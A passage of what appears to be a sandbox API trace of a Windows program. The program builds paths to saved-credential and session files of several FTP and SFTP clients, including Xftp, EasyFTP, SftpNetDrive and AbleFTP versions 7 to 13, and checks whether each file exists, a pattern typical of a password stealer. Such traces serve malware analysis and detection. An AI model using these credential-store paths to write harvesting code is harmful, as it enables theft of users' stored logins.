(pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0313.908] GetProcessHeap () returned 0x780000 [0313.908] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.908] GetProcessHeap () returned 0x780000 [0313.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.909] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.909] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0313.909] GetProcessHeap () returned 0x780000 [0313.909] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79b318 [0313.910] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.910] wvsprintfW (in: param_1=0x79b318, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0313.910] GetProcessHeap () returned 0x780000 [0313.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797d90 [0313.911] GetProcessHeap () returned 0x780000 [0313.911] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.912] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0313.912] GetProcessHeap () returned 0x780000 [0313.912] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.912] GetProcessHeap () returned 0x780000 [0313.913] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797d90 | out: hHeap=0x780000) returned 1 [0313.913] GetProcessHeap () returned 0x780000 [0313.913] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.913] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.914] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0313.914] GetProcessHeap () returned 0x780000 [0313.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79b318 [0313.915] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.915] wvsprintfW (in: param_1=0x79b318, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0313.915] GetProcessHeap () returned 0x780000 [0313.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x798dd8 [0313.915] GetProcessHeap () returned 0x780000 [0313.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.916] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0313.917] GetProcessHeap () returned 0x780000 [0313.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.934] GetProcessHeap () returned 0x780000 [0313.934] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.947] GetProcessHeap () returned 0x780000 [0313.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.947] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.948] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.948] GetProcessHeap () returned 0x780000 [0313.948] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b318 [0313.951] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.952] wvsprintfW (in: param_1=0x79b318, param_2="%s\\EasyFTP\\data", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0313.952] GetProcessHeap () returned 0x780000 [0313.952] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x798dd8 [0313.952] GetProcessHeap () returned 0x780000 [0313.952] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.953] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0313.953] GetProcessHeap () returned 0x780000 [0313.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.954] GetProcessHeap () returned 0x780000 [0313.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.954] GetProcessHeap () returned 0x780000 [0313.954] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0313.954] GetProcessHeap () returned 0x780000 [0313.954] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b598 [0313.954] GetProcessHeap () returned 0x780000 [0313.954] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b318 [0313.955] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.955] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79b318 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0313.955] GetProcessHeap () returned 0x780000 [0313.955] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b528 [0313.956] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.957] wvsprintfW (in: param_1=0x79b528, param_2="%s\\SftpNetDrive", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0313.957] GetProcessHeap () returned 0x780000 [0313.957] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x68) returned 0x798dd8 [0313.957] GetProcessHeap () returned 0x780000 [0313.957] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b528 | out: hHeap=0x780000) returned 1 [0313.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.958] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0313.959] GetProcessHeap () returned 0x780000 [0313.959] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.959] GetProcessHeap () returned 0x780000 [0313.959] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.959] GetProcessHeap () returned 0x780000 [0313.960] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.960] GetProcessHeap () returned 0x780000 [0313.960] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b598 | out: hHeap=0x780000) returned 1 [0313.960] GetProcessHeap () returned 0x780000 [0313.960] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0313.960] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.961] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0313.961] GetProcessHeap () returned 0x780000 [0313.961] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0313.961] GetProcessHeap () returned 0x780000 [0313.962] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.963] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0313.963] GetProcessHeap () returned 0x780000 [0313.963] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.963] GetProcessHeap () returned 0x780000 [0313.963] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0313.964] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.965] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0313.965] GetProcessHeap () returned 0x780000 [0313.965] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0313.965] GetProcessHeap () returned 0x780000 [0313.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.966] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0313.966] GetProcessHeap () returned 0x780000 [0313.967] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.967] GetProcessHeap () returned 0x780000 [0313.967] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0313.967] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.968] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0313.968] GetProcessHeap () returned 0x780000 [0313.968] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0313.968] GetProcessHeap () returned 0x780000 [0313.968] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.971] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0313.971] GetProcessHeap () returned 0x780000 [0313.971] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.972] GetProcessHeap () returned 0x780000 [0313.972] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0313.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.973] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0313.973] GetProcessHeap () returned 0x780000 [0313.973] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0313.973] GetProcessHeap () returned 0x780000 [0313.973] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.974] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0313.974] GetProcessHeap () returned 0x780000 [0313.974] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.974] GetProcessHeap () returned 0x780000 [0313.974] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0313.975] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.976] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0313.976] GetProcessHeap () returned 0x780000 [0313.976] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0313.976] GetProcessHeap () returned 0x780000 [0313.976] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.977] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0313.977] GetProcessHeap () returned 0x780000 [0313.977] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.977] GetProcessHeap () returned 0x780000 [0313.977] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0313.978] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.979] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0313.979] GetProcessHeap () returned 0x780000 [0313.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0313.979] GetProcessHeap () returned 0x780000 [0313.979] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.999] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0313.999] GetProcessHeap () returned 0x780000 [0314.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.000] GetProcessHeap () returned 0x780000 [0314.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.000] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.001] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0314.001] GetProcessHeap () returned 0x780000 [0314.001] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.001] GetProcessHeap () returned 0x780000 [0314.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.003] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0314.003] GetProcessHeap () returned 0x780000 [0314.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.003] GetProcessHeap () returned 0x780000 [0314.003] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.004] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.005] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.005] GetProcessHeap () returned 0x780000 [0314.005] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.005] GetProcessHeap () returned 0x780000 [0314.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.006] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.007] GetProcessHeap () returned 0x780000 [0314.007] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.007] GetProcessHeap () returned 0x780000 [0314.007] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.008] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.008] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.008] GetProcessHeap () returned 0x780000 [0314.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.008] GetProcessHeap () returned 0x780000 [0314.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.010] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.010] GetProcessHeap () returned 0x780000 [0314.010] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.010] GetProcessHeap () returned 0x780000 [0314.010] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.011] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.012] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0314.012] GetProcessHeap () returned 0x780000 [0314.012] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.012] GetProcessHeap () returned 0x780000 [0314.012] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.013] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0314.014] GetProcessHeap () returned 0x780000 [0314.014] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.014] GetProcessHeap () returned 0x780000 [0314.014] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.015] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.015] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.015] GetProcessHeap () returned 0x780000 [0314.015] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.015] GetProcessHeap () returned 0x780000 [0314.016] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.017] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.017] GetProcessHeap () returned 0x780000 [0314.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.017] GetProcessHeap () returned 0x780000 [0314.017] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.018] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.019] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.019] GetProcessHeap () returned 0x780000 [0314.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.019] GetProcessHeap () returned 0x780000 [0314.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.020] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.020] GetProcessHeap () returned 0x780000 [0314.020] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.020] GetProcessHeap () returned 0x780000 [0314.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.021] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.022] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0314.022] GetProcessHeap () returned 0x780000 [0314.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.022] GetProcessHeap () returned 0x780000 [0314.022] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.023] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0314.023] GetProcessHeap () returned 0x780000 [0314.024] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.024] GetProcessHeap () returned 0x780000 [0314.024] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.024] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.025] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.025] GetProcessHeap () returned 0x780000 [0314.025] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.025] GetProcessHeap () returned 0x780000 [0314.026] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.027] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.027] GetProcessHeap () returned 0x780000 [0314.028] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.028] GetProcessHeap () returned 0x780000 [0314.028] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.029] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.029] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.029] GetProcessHeap () returned 0x780000 [0314.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.029] GetProcessHeap () returned 0x780000 [0314.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.031] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.031] GetProcessHeap () returned 0x780000 [0314.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.031] GetProcessHeap () returned 0x780000 [0314.031] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.032] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.033] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0314.033] GetProcessHeap () returned 0x780000 [0314.033] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.033] GetProcessHeap () returned 0x780000 [0314.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.034] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0314.034] GetProcessHeap () returned 0x780000 [0314.035] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.035] GetProcessHeap () returned 0x780000 [0314.035] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.036] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.036] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.036] GetProcessHeap () returned 0x780000 [0314.036] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.036] GetProcessHeap () returned 0x780000 [0314.037] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.038] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.038] GetProcessHeap () returned 0x780000 [0314.038] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.038] GetProcessHeap () returned 0x780000 [0314.038] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.039] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.040] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.040] GetProcessHeap () returned 0x780000 [0314.040] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.040] GetProcessHeap () returned 0x780000 [0314.041] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.041] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.042] GetProcessHeap () returned 0x780000 [0314.042] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.050] GetProcessHeap () returned 0x780000 [0314.050] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.051] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.052] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0314.052] GetProcessHeap () returned 0x780000 [0314.052] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.052] GetProcessHeap () returned 0x780000 [0314.052] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.053] LoadLibraryW 